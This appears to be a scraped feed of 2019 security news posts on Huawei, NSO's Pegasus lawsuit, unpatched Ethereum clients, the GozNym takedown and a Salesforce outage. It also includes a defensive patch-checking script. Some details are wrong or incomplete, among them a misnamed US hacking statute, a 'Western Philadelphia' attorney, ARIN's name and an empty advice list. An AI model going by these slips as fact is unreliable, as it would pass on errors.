Chipmakers Cut Huawei Shipments


European and US chipmakers have stopped supplying Huawei with products while Google will cease providing technical Android support from the next OS iteration, as Donald Trump’s executive order starts to bite.

Google said in a tweet yesterday: “while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.”

However, it’s believed the same will not be true of new Huawei handsets. Google is also set to cut key support for the operating system from its next version, which could leave users without apps like YouTube and Google Maps, according to reports.

Huawei could still use the open source version of Android, although it has been developing an in-house OS which it could also switch across to in the event that Trump’s executive order is not reversed.

The firm is also being hit as global chipmakers cut supplies in compliance with the order. Qualcomm (smartphones), Intel (servers and laptops), Xilinx and Broadcom (networking kit) and many other US producers, as well as German chipmaker Infineon, have reportedly taken immediate action.

Huawei produces some processors and modems for its smartphones in-house, so Qualcomm’s decision is perhaps the least likely to affect it. The firm is said to have stockpiled other types of chips for several months while it waits to see whether the US action is a bargaining play or is set for the long-term.

Trump signed an executive order last week banning “foreign adversaries” from providing telecoms equipment in the US. However, Huawei and 70 subsidiaries were also placed on an “Entity List” meaning US firms are not able to supply it with their products unless Huawei is granted a special license from the Commerce Department.

Although the tech firms have already taken action, the department is still drawing up the enforcement plan, and has 150 days to do so.

3 Ways to Improve Your Online Store’s Cyber Security

If you don’t do your utmost to ensure that your online store is safe to use, you could end up putting your customers in real danger. From their finances being stolen to their personal data being hacked into, any kind of trouble could befall your site’s users if you do not take cyber security seriously. Make sure, then, that you take it seriously!

When it comes to improving your online store’s cybersecurity measures, the following advice makes for essential reading.

Make your mobile payments safer

One of the most burgeoning e-commerce trends is mobile payment. As stated in Oberlo’s mobile shopping trends article, this is because this kind of transaction process prioritizes comfort, and it makes the buying process a whole lot simpler. You would be foolish not to grant your customers the opportunity to pay for things on your store via their mobile devices.

Allowing this kind of payment does come with its fair share of drawbacks, however, the biggest being that it isn’t always the safest form of transaction. This doesn’t mean that you can’t strengthen your mobile payment process, though. Some of the measures that you can and should put into place in this instance include:

  • Only ever using a trusted payment platform
  • Ensuring that your payment terminals are NFC-enabled
  • Encrypting your network so that sensitive information cannot be intercepted as it travels through it

Switch to HTTPS

In this day and age, if you continue to stick with the HTTP protocol, your online store will be a sitting duck for cyber criminality. If you’re serious about safety, you must switch to HTTPS.

Created initially to safeguard the particularly sensitive elements of e-commerce sites, such as the payment process, HTTPS is now used to protect whole websites. By embracing this protocol, you will be able to be sure that your visitors’ data will remain safe at all conceivable points.

Protect your Admin Panel

Your Admin Panel is the aspect of your store that is least difficult for cybercriminals to crack. All it takes is for you to set a weak password, and hackers can have a field day when it comes to accessing all of the data you store in the backend of your site.

To protect your Admin Panel, you need to:

If they were to encounter trouble with a cybercriminal while using your online store, you can be sure that your customers will not give you a second chance. They will lose trust in you instantly, and more than likely never return to you again — and they’ll tell everybody that they know to avoid your website in the future, too, for good measure. If you don’t take cybersecurity seriously, you could even find yourself in hot water with the authorities. The impact cyber criminality could have on your online store is something you should want to avoid at all costs, which is why you must put all of the above advice into practice as soon as possible.

The post 3 Ways to Improve Your Online Store’s Cyber Security appeared first on CyberDB.

Amnesty International filed a lawsuit against Israeli surveillance firm NSO

Amnesty International filed a lawsuit against Israeli surveillance firm NSO and fears its staff may be targeted by the company with its Pegasus spyware.

The name NSO Group made the headlines last week after the disclosure of the WhatsApp flaw exploited by the company to remotely install its surveillance software.

The Israeli firm is now facing a lawsuit backed by Amnesty International, and the non-governmental organization fears its staff may be under surveillance by spyware delivered through the WhatsApp flaw.

The lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

“An affidavit from Amnesty is at the heart of the case, and concludes that “staff of Amnesty International have an ongoing and well-founded fear they may continue to be targeted and ultimately surveilled” after a hacking attempt last year.” reads the post published by The Guardian.

“The Israeli government’s Defence Export Controls Agency has failed to exercise proper oversight “despite serious allegations of abuse”, the affidavit claimed, adding: “Because of DECA’s inaction, NSO Group can continue to sell its software to governments known to target human rights defenders.””

Officially, the sale of surveillance software is limited to authorized governments, to support agencies’ investigations into criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar and Saudi Arabia, where the Israeli surveillance software is becoming very popular.

In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the trade in surveillance software is getting out of control.

In August, the human rights group published a report that provides details on the attack against an employee at Amnesty International. The hackers attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.


The organization added that such attacks are becoming even more frequent, with a growing amount of Israeli surveillance software being used to spy on human rights workers and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

The Guardian reported that NSO Group already faced many other lawsuits, such as the one backed by Omar Abdulaziz, a Saudi dissident based in Montreal. In December Abdulaziz filed a lawsuit in Israel in which he claimed that his phone was infected with the NSO spyware when he was in regular contact with the journalist Jamal Khashoggi.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Khashoggi is believed to have been killed by Saudi Arabia’s agents, and the country licensed NSO software in 2017, paying $55m for the technology.

NSO said it wants to demonstrate that it is not involved in any abuse of its technology, and it prepared a 26-page report to reply to the accusations made by Amnesty and Citizen Lab.

It is curious that in early 2019, a majority stake in NSO was acquired by the London-based firm Novalpina Capital, founded by the banker and philanthropist Stephen Peel.

The Guardian reported an excerpt of the reply to Amnesty, signed by Peel, that states that in “almost all” the cases of complaints of human rights abuse raised, the alleged victim of hacking had not been a target or the government in question had acted with “due lawful authority”.

“We believe that the reality is different. We’ve seen them target human rights organisations and no evidence they’ve been able to effectively control governments when complaints have been raised.” replied Danna Ingleton, the deputy director of Amnesty’s technology division.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – NSO Group, Amnesty International)

The post Amnesty International filed a lawsuit against Israeli surveillance firm NSO appeared first on Security Affairs.

On the path to Zero Trust security: Time to get started

No need to belabour the point. We all know that trying to defend the network perimeter is a bit futile in today’s mobile and cloud first world. So, the obvious question – what’s next? Vendors are quick to come to your aid with their latest, next generation, virtualized, machine learning and AI based security platform. Industry analysts on the other hand are proposing various security frameworks and approaches for reducing risk. Whether it’s Gartner with … More

The post On the path to Zero Trust security: Time to get started appeared first on Help Net Security.

Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too

Microsoft has rewritten and open-sourced Attack Surface Analyzer (ASA), a security tool that points out potentially risky system changes introduced by the installation of new software or configuration changes. About Attack Surface Analyzer The initial version of the tool (v1.0, aka “classic”) was released in 2012 and worked only on Windows. It can still be downloaded, but is no longer supported. This newest version (v.2.0) is built using .NET Core 2.1 and Electron, and … More

The post Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too appeared first on Help Net Security.

Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. Initial predictions were that these would increase; however, improvements in cybersecurity measures and detection have impacted the success rates of these attacks. In fact, there has been a … More

The post Ransomware and malware attacks decline, attackers adopting covert tactics appeared first on Help Net Security.

Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high. The results were released in the Q1 2019 Vulnerability QuickView Report. CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities. Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD … More

The post Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector appeared first on Help Net Security.

Keeping Passwords Simple

We know at times this whole password thing sounds really complicated. Wouldn't it be great if there was a brain-dead way you could keep passwords simple and secure at the same time? Well, it's not nearly as hard as you think. Here are three tips to keeping passwords super simple while keeping your accounts super secure.

Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks

Users of Software-as-a-Service (SaaS) and webmail services are being targeted with increasing frequency, according to the APWG Q1 2019 Phishing Activity Trends Report. The category became the biggest target in Q1, accounting for 36 percent of all phishing attacks, for the first time eclipsing the payment-services category which suffered 27 percent of attacks recorded in the quarter. Online SaaS applications have become fundamental business tools, since they are convenient to use and cost-effective. SaaS services … More

The post Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks appeared first on Help Net Security.

Do You Know When The First Cyber Attack Took Place? Read On

WannaCry, a malicious computer virus that encrypts data and demands ransom, hit thousands of computers across the world, causing several organizations to close down. Not a day goes by without a large company admitting that its data has been breached. Cyber attacks are thought of as a thing of modern life, but their story goes back further than expected.

Do you know when the first cyber attack occurred? Many attribute this to Robert Morris, a 20-year-old Cornell undergraduate student, in 1988. He was also the first person to be charged under the Fraud and Cyber Abuse Act. Nevertheless, this was not the first cyber attack. The first cyber attack happened when optical telegraphy known as semaphore was used, long before our Internet and computers came into existence. This happened in the year 1834.

The semaphore system consisted of a chain of towers, each with a movable wooden arm at its top. Different configurations of these arms were used to denote different symbols, letters, and numbers. The operators of each tower would use a telescope to read the configuration of the adjacent tower and then reproduce it on their own tower. This made it possible to deliver messages much faster. The semaphore network was reserved exclusively for government use; however, in 1834, two brothers, François and Joseph Blanc, came up with a means of hacking into the system for their personal benefit.

François and Joseph Blanc were dealing with government bonds on the Bordeaux stock exchange that kept a close watch on the Paris stock exchange. The Paris stock exchange was the primary market, and the secondary markets always lagged due to the time it took for the information to travel through the post. So if traders could get to know the information in advance, they could make a lot of money by anticipating the market move.

The Blanc brothers bribed a telegraph operator in Tours, who had an accomplice in Paris to supply him with stock market information. The operator would then relay the news from Tours to Bordeaux over the semaphore system. He smuggled it through by inserting deliberate errors, acting as a code, into government messages; these were later deciphered by another operator working for the Blancs who was stationed close to the Bordeaux end of the line.

This lasted for approximately two years, until one day the Tours operator became ill. He shared the scheme with one of his friends, hoping that he would continue the practice. The friend declined and reported the operator to the authorities. The Blanc brothers were arrested for their cyber attack but were released due to the lack of an adequate law.

“The Blanc brothers’ story is also a reminder that with any new invention, people will always find a way to use it maliciously. This is a timeless aspect of human nature, and it’s not something technology can or should be designed to solve,” said Tom Standage of The Economist. This is still so relevant.


The post Do You Know When The First Cyber Attack Took Place? Read On appeared first on .

Companies investing in advanced forensic capabilities to identify attackers in greater detail

One in five companies is already using forensic investigations and other sophisticated methods to identify their attackers, like setting up honey pots and repositories of fake data to give attackers the idea they’ve hit real data while acting as a diversion tactic, according to Neustar. Companies’ growing investment in advanced forensic capabilities that can help identify attackers in greater detail is increasingly eclipsing what most law-enforcement agencies are willing to devote. 72 percent of respondents … More

The post Companies investing in advanced forensic capabilities to identify attackers in greater detail appeared first on Help Net Security.

Things You Need to Know About Open Source – The FAQ Edition

Open Source projects can be a great asset, or they can be a curse. It is all in how you manage them. To be successful in using open source, there are several things to keep in mind, from licensing to updates. And if you ignore any of them, it can cause problems. Here are some […]… Read More

The post Things You Need to Know About Open Source – The FAQ Edition appeared first on The State of Security.

JASK launches a new Heads Up Display for security operations centers

JASK, the provider of the industry’s first cloud-native SIEM platform, unveiled a first-of-its-kind Heads Up Display (HUD) for security operations centers (SOCs) based on cutting-edge scientific design principles and visualization concepts never before used in the cybersecurity industry. Drawing inspiration from leading designers in science fiction and gaming as well as the latest user interface design concepts, the enhanced JASK ASOC platform offers maximal functionality on a single screen. This update enables security teams to … More

The post JASK launches a new Heads Up Display for security operations centers appeared first on Help Net Security.

QuintessenceLabs to extend support for RSA Data Protection Manager software customers

QuintessenceLabs has announced a partnership to allow customers of RSA Data Protection Manager software (DPM) to receive extended support beyond the RSA DPM End-Of-Life date of September 30, 2019. As part of this agreement, QuintessenceLabs will provide the same level of enterprise-class support, Service Level Objectives and product quality as RSA provided. RSA DPM customers can renew their DPM maintenance contract directly with QuintessenceLabs to benefit from long-term DPM support. QuintessenceLabs is also providing a … More

The post QuintessenceLabs to extend support for RSA Data Protection Manager software customers appeared first on Help Net Security.

Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS

Checkmarx, the Software Exposure Platform for the enterprise, has deployed CxSAST on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS). This deployment facilitates Federal agencies to grant a FedRAMP Moderate or DOD Impact Level 5 (IL5) Authority to Operate (ATO) for a cloud deployment of the Checkmarx CxSAST solution. By being deployed on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS), Checkmarx inherits a vast majority of the controls required for FedRAMP and … More

The post Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS appeared first on Help Net Security.

ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats

ExtraHop, provider of enterprise cyber analytics from the inside out, launched the ExtraHop for IBM QRadar app, which integrates with IBM Security Intelligence technology to stream accurate, contextual network behavioral detections into the QRadar SIEM. With Reveal(x) detections in QRadar, organizations have a complete picture of suspicious or anomalous behavior on their network, as well as the ability to perform rapid, guided investigations. This bi-directional integration lets analysts move back to ExtraHop to explore forensic … More

The post ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats appeared first on Help Net Security.

HSB Farm Cyber Insurance solution to protect farmers from hackers and malware

Hartford Steam Boiler (HSB), part of Munich Re, announced a new HSB Farm Cyber Insurance solution that helps protect farmers and farm technology from hackers, malware and other cyber attacks. “Innovative technologies are being deployed across the farming industry and data and information systems are helping farmers better understand how to maximize efficiency and production,” said James Hajjar, who leads the cyber practice for HSB’s reinsurance clients. “With this new reliance on digital information and … More

The post HSB Farm Cyber Insurance solution to protect farmers from hackers and malware appeared first on Help Net Security.

Venafi and GlobalSign partnership and integration to address DevOps certificate challenges

Venafi, the leading provider of machine identity protection, and GMO GlobalSign, a global Certificate Authority and leading provider of identity and security solutions for the Internet of Things (IoT), announced an expanded technology partnership and integration that seamlessly addresses DevOps certificate challenges. Additionally, Venafi Cloud is now fully integrated with GlobalSign’s high-performance PKI solutions for enterprises. The integration of Venafi Cloud and GlobalSign PKI for DevOps provides DevOps teams with quick, high-speed access to trusted … More

The post Venafi and GlobalSign partnership and integration to address DevOps certificate challenges appeared first on Help Net Security.

FlexiCapture Cloud now enhanced with REST API and Real-Time Capture

ABBYY, a global leader in Content IQ technologies and solutions, announced a series of innovations to ABBYY FlexiCapture, an AI-enabled enterprise platform to automate document processing workflows and convert unstructured content into structured data for better business outcomes. The updates include the launch of the ABBYY FlexiCapture Cloud REST API (Representational State Transfer Application Programming Interface) and the introduction of the new Real-Time Capture technology for real-time document processing in the cloud. As companies strive … More

The post FlexiCapture Cloud now enhanced with REST API and Real-Time Capture appeared first on Help Net Security.

At-Bay launches excess cyber insurance policy for clients up to $5Bn revenue

At-Bay launched an excess cyber insurance policy for clients across all industry classes. At-Bay developed this product to fulfill broker demand for access to the At-Bay Security Team for organizations with insurance towers. The At-Bay Security Team provides insureds with ongoing vulnerability scanning, threat monitoring, and 24/7 support to help prevent loss. With the new product launch, At-Bay has made these security services available to Excess clients. “We wanted to create an excess program for … More

The post At-Bay launches excess cyber insurance policy for clients up to $5Bn revenue appeared first on Help Net Security.

HITRUST supports Texas legislation to create a Privacy Protection Advisory Council

HITRUST, a leading data protection standards development and certification organization, supports legislation that would create a council to study privacy laws and how privacy practices for Texas businesses could be strengthened through potential legislation. Representative Giovanni Capriglione’s (Southlake) House Bill 4390, passed by the Texas House unanimously on May 7, 2019 and would create the Texas Privacy Protection Advisory Council. The Council would study and evaluate Texas laws and other privacy laws in order to … More

The post HITRUST supports Texas legislation to create a Privacy Protection Advisory Council appeared first on Help Net Security.

Weekly Update 139


Per the beginning of the video, it's out late, I'm jet lagged, all my clothes are dirty and I've had to raid the conference swag cupboard to even find a clean t-shirt. But be that as it may, I'm yet to miss one of these weekly vids in the 2 and a half years I've been doing them and I'm not going to start now! So with that very short intro done, here's this week's and I'll try and be a little more on the ball for the next one.



  1. Google is having some issues with the U2F keys they recommend for their Advanced Protection Program (but seriously, this is a pretty minor issue)
  2. I'm definitely still recommending this approach for locking down Google accounts (that's my piece from November on how to get it all set up)
  3. Forbes had some Magecart script running on their site (interesting breakdown by @bad_packets)
  4. Let's Encrypt's CT log is now up and running (with support from Sectigo too so kudos to them for that, it's a very different approach to the old Comodo)
  5. I'm up for some European Blogger Awards again! (I'd love your votes folks 😎)
  6. Twilio is sponsoring my blog again this week (check how to implement 2FA in your app with Authy)

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline in malware infections, and especially fewer cases of ransomware, compared to 2017. The European country of almost 5 million people is mirroring the global trend in cybersecurity issues, as cybercriminals are transitioning en masse from disruptive and destructive ransomware to silent yet very profitable phishing and cryptojacking. Ireland recorded a monthly infection rate of just 1.26% in 2018, one of the lowest in the European region and one of the lowest globally.

This is a sharp contrast to 2017, when millions of computers worldwide were heavily infected by ransomware, most notably WannaCry and NotPetya. Cryptojacking is easy to deploy and very difficult to detect, as it is basically a program that consumes CPU/GPU resources like any other program on a computing device. But the consumed CPU/GPU resources do not produce tangible output like a typical benign program; instead they are used to compute crypto-hashes in an attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that allows anything that goes wrong to grow exponentially.


The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk

Security researchers from SRLabs have published a report that analyzed the risks to the Ethereum network caused by unpatched Ethereum clients.

Researchers at SRLabs published a report based on collected data, which revealed that a large number of nodes running the popular Parity and Geth clients are still unpatched. The experts found that the Ethereum clients and their users remained exposed for “extended periods of time” after security patches had been released.

“SRLabs research suggests that security vulnerabilities remain unpatched for many Ethereum blockchain participants for extended periods of time, putting the blockchain ecosystem at risk.” reads the report.

Experts pointed out that a hacker who controls more than 51% of the computational power in the Ethereum network can double-spend coins and undermine trust in the ecosystem. An attacker who can crash a large number of nodes could reach 51% of the network more easily.

For that reason, denial-of-service issues are classified as high severity in cryptocurrency networks: attackers can leverage them to reduce the amount of computational power needed to perform a 51% attack.

In February, SRLabs reported a vulnerability in the Parity client that could be exploited to remotely crash Parity Ethereum nodes running versions prior to 2.2.10.

“According to our collected data, only two thirds of nodes have been patched so far. Shortly after we reported this vulnerability, Parity released a security alert, urging participants to update their nodes.” continues the report.

A month after the flaw was patched, experts have found that around 40% of all scanned Parity Ethereum nodes remained unpatched. Another patch released on Mar 2, 2019 was installed by around 70% of Parity Ethereum nodes, leaving the remaining 30% exposed.

The situation is worse if we consider that 7 percent of Parity nodes still run a version vulnerable to a critical consensus vulnerability patched in July 2018.

The following graph shows the percentage of unpatched Ethereum nodes in 2019 that decreases slowly over time.

[Figure: Ethereum nodes, percentage of unpatched nodes in 2019]

Researchers explained that the Parity Ethereum client has an automated update process, but it suffers from high complexity and some updates are left out.

The report confirms that patch management for the Geth client, which has no auto-update feature, is even worse: Geth clients remained unpatched for longer periods of time.

“According to their announced headers, around 44% of the Geth nodes visible at were below version v.1.8.20, a security-critical update, released two months before our measurement,” continues the SRLabs team.

Experts conclude that the lack of basic patch hygiene undermines the security of the entire Ethereum ecosystem.
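As an added illustration of the version-based patch check the report describes (example code written for this page, not SRLabs’ tooling), the script below classifies announced client-version strings against the two thresholds the article names, Parity 2.2.10 and Geth 1.8.20, and computes the unpatched share per client. The header format and threshold table are assumptions, and the sample headers are constructed, not real scan data.

```python
import re

# Assumed thresholds taken from the article: Parity < 2.2.10 is remotely
# crashable, Geth < 1.8.20 lacks a security-critical update. Versions are
# compared as (major, minor, patch) tuples so 1.9.0 sorts above 1.8.20.
MIN_PATCHED = {
    "geth": (1, 8, 20),
    "parity": (2, 2, 10),
}

# Leading "<client>/v<semver>" part of the client-version string a node
# announces (assumed to follow the web3_clientVersion layout).
CLIENT_RE = re.compile(
    r"^(?P<client>Geth|Parity-Ethereum|Parity)/v(?P<ver>\d+\.\d+\.\d+)",
    re.IGNORECASE,
)


def parse_client_version(header):
    """Return (client, (major, minor, patch)) for a known client, else None."""
    m = CLIENT_RE.match(header.strip())
    if m is None:
        return None
    client = "parity" if m.group("client").lower().startswith("parity") else "geth"
    version = tuple(int(part) for part in m.group("ver").split("."))
    return client, version


def is_patched(header):
    """True/False for a recognised client, None for anything unclassifiable."""
    parsed = parse_client_version(header)
    if parsed is None:
        return None
    client, version = parsed
    return version >= MIN_PATCHED[client]


def unpatched_share(headers):
    """Fraction of recognised nodes, per client, that sit below the threshold."""
    total = {}
    unpatched = {}
    for header in headers:
        parsed = parse_client_version(header)
        if parsed is None:
            continue  # unknown client: left out of the denominator, not assumed safe
        client, version = parsed
        total[client] = total.get(client, 0) + 1
        if version < MIN_PATCHED[client]:
            unpatched[client] = unpatched.get(client, 0) + 1
    return {client: unpatched.get(client, 0) / total[client] for client in total}


# Constructed sample of announced headers (build hashes are placeholders).
SAMPLE_HEADERS = [
    "Geth/v1.8.23-stable-0000000/linux-amd64/go1.11.5",
    "Geth/v1.8.20-stable-0000000/linux-amd64/go1.11.2",
    "Geth/v1.8.19-stable-0000000/linux-amd64/go1.11.2",     # below 1.8.20
    "Geth/v1.8.17-stable-0000000/windows-amd64/go1.11.1",   # below 1.8.20
    "Geth/v1.9.0-unstable/linux-amd64/go1.12",
    "Parity-Ethereum/v2.2.11-stable-0000000-20190215/x86_64-linux-gnu/rustc1.32.0",
    "Parity-Ethereum/v2.2.10-stable-0000000-20190212/x86_64-linux-gnu/rustc1.32.0",
    "Parity-Ethereum/v2.2.9-stable-0000000-20190130/x86_64-linux-gnu/rustc1.32.0",  # below 2.2.10
    "Parity-Ethereum/v2.3.2-beta-0000000-20190213/x86_64-linux-gnu/rustc1.32.0",
    "besu/v1.0.0/linux-x86_64/oracle_openjdk-java-11",  # not classified
]

if __name__ == "__main__":
    for client, share in sorted(unpatched_share(SAMPLE_HEADERS).items()):
        print(f"{client}: {share:.0%} of recognised nodes unpatched")
```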


(SecurityAffairs – patch management, hacking)

The post Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk appeared first on Security Affairs.

Week in review: New Intel CPU vulnerabilities, SharePoint servers under attack

Here’s an overview of some of last week’s most interesting news and articles:

High-risk vulnerability in Cisco’s secure boot process impacts millions of devices: Red Balloon Security has discovered a high-risk vulnerability in Cisco’s secure boot process which impacts a wide range of Cisco products in use among enterprise and government networks, including routers, switches and firewalls.

Tips to spring clean your company’s social media and stay protected: Spring is a great time for organizations …

The post Week in review: New Intel CPU vulnerabilities, SharePoint servers under attack appeared first on Help Net Security.

Law Enforcement Operation Dismantles GozNym Banking Malware

An international law enforcement operation has led to the dismantling of the global cybercrime network that used the GozNym banking malware to steal money from bank accounts across the world.

TechCrunch reports, “Europol and the U.S. Justice Department, with help from six other countries, have disrupted and dismantled the GozNym malware, which they say stole more than $100 million from bank accounts since it first emerged.”

Prosecutors have stated, in a press conference held in The Hague, that ten defendants in five countries have been charged with using the GozNym malware to steal money from over 41,000 victims, including businesses and financial institutions. Of these ten people, five have been arrested in Moldova, Ukraine, Bulgaria, and Russia, while the remaining five, all Russians, are on the run. The leader of the cybercrime network and his technical assistant are being prosecuted in Georgia.

TechCrunch security editor Zack Whittaker writes, “All were charged with conspiracy to commit computer fraud, conspiracy to commit wire and bank fraud and conspiracy to commit money laundering. An eleventh member of the conspiracy, Krasimir Nikolov, was previously charged and extradited to the U.S. in 2016 and pleaded guilty in April in his role in the GozNym malware network.”

He adds, “The takedown was described as an ‘unprecedented international effort’ by Scott Brady, U.S. attorney for Western Philadelphia — where a grand jury indicted the defendants — at the press conference announcing the charges.”

The victims of the GozNym attacks have not been named, but it’s reported that in the U.S. at least 11 businesses, including two law firms and a casino, plus a church, have been impacted.

The banking malware GozNym was developed from two existing malware families, Gozi and Nymaim, and spread across the U.S., Germany, Poland and Canada. It first emerged in 2016 and has hit dozens of banks and credit unions since then. The leader of the cybercrime network behind GozNym had built it from the code of the two malware families, both of which had their source code leaked years earlier. He then recruited accomplices and advertised GozNym on Russian-speaking forums.

The TechCrunch report explains how GozNym, which is described as malware “as a service”, works: “The malware used encryption and other obfuscation techniques to avoid detection by antivirus tools. Then, spammers are said to have sent hundreds of thousands of phishing emails to infect staff at businesses and banks. After the malware infected its victim computers, the malware would steal the passwords control of bank accounts, which the criminals would later log in and cash out.”

The report further says that according to prosecutors, the GozNym network was “hosted and operated through a bulletproof service, a domain and web hosting known for lax attitudes toward cybercrime and favored by criminals.”

An administrator of the “Avalanche” network, an infrastructure platform which provided services to over 200 cybercriminals and which was dismantled in 2016 during a German-led operation, had also provided bulletproof hosting services to the GozNym network. This administrator would also face prosecution in Ukraine (where his apartment is located) for his role in providing bulletproof hosting services to the GozNym network.


The post Law Enforcement Operation Dismantles GozNym Banking Malware appeared first on .

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.



Hacking the ‘Unhackable’ eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war on rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys exposes users to Bluetooth Attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild’ project tracks zero-days exploited in the Wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker group’s arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

Salesforce faced one of its biggest service disruptions ever

Salesforce is facing a huge outage: it shut down a good portion of its infrastructure after a change to the production environment.

A change in the production environment is the root cause of the broad outage suffered by Salesforce.

The service disruption affected its Pardot B2B marketing automation system. The cloud CRM company’s change broke access privilege settings across organizations and gave customers access to all of their respective company’s files.

“One of our projects had all its profiles modified to enable modify all, allowing all users access to all data.” reported a user on Reddit.

In response to the incident, Salesforce blocked all access to around a hundred cloud instances that host Pardot users, which also cut off access for every other user of those same systems, even if they were not using Pardot.

Salesforce customers have been unable to access the service since 09:56 PDT (16:56 UTC) on Friday.

“The deployment of a database script resulted in granting users broader data access than intended,” reads a note published by the company. “To protect our customers, we have blocked access to all instances that contain affected customers until we can complete the removal of the inadvertent permissions in the affected customer orgs.”


Patrick Harris, Salesforce CTO and co-founder, also published a message on the outage.

A few hours ago, Salesforce informed its users that it was able to restore access to most of its services, which means that users experienced at least 15 hours of service disruption. Unfortunately, some organizations may still face problems: according to the latest notice issued by the CRM firm, administrators will have to manually repair user account permissions.

“We have restored administrators’ access to all orgs affected by the recent permissions issue and have prepared a set of instructions for admins that may need guidance on how to manually restore user permissions. We have updated the instructions to include guidance for Field Service Lightning administrators.” states the company. “Those instructions can be found in this Known Issue article: In parallel, we are working on an automated provisioning fix to allow us to restore user permissions to where they were before the incident occurred.”

The company warns that a limited number of admins may still be experiencing issues such as logging in to their organizations or modifying permissions.


Thank you

Pierluigi Paganini

(SecurityAffairs – Salesforce, outage)

The post Salesforce faced one of its biggest service disruptions ever appeared first on Security Affairs.

Fraudulently Acquired IPv4 Addresses Revoked by ARIN

The US Registry for Internet Numbers, Ltd. (ARIN) won a legal case against a multi-year scheme designed to deceive the Internet community out of approximately 735,000 IPv4 addresses. John Curran, President and CEO of ARIN, announced that the fraud had been discovered through an internal due diligence process.

ARIN is a non-profit organization responsible for distributing Internet numbers in the United States, Canada and parts of the Caribbean. The emerging market for IPv4 address transfers and growing demand have led to new attempts to fraudulently obtain IPv4 addresses.

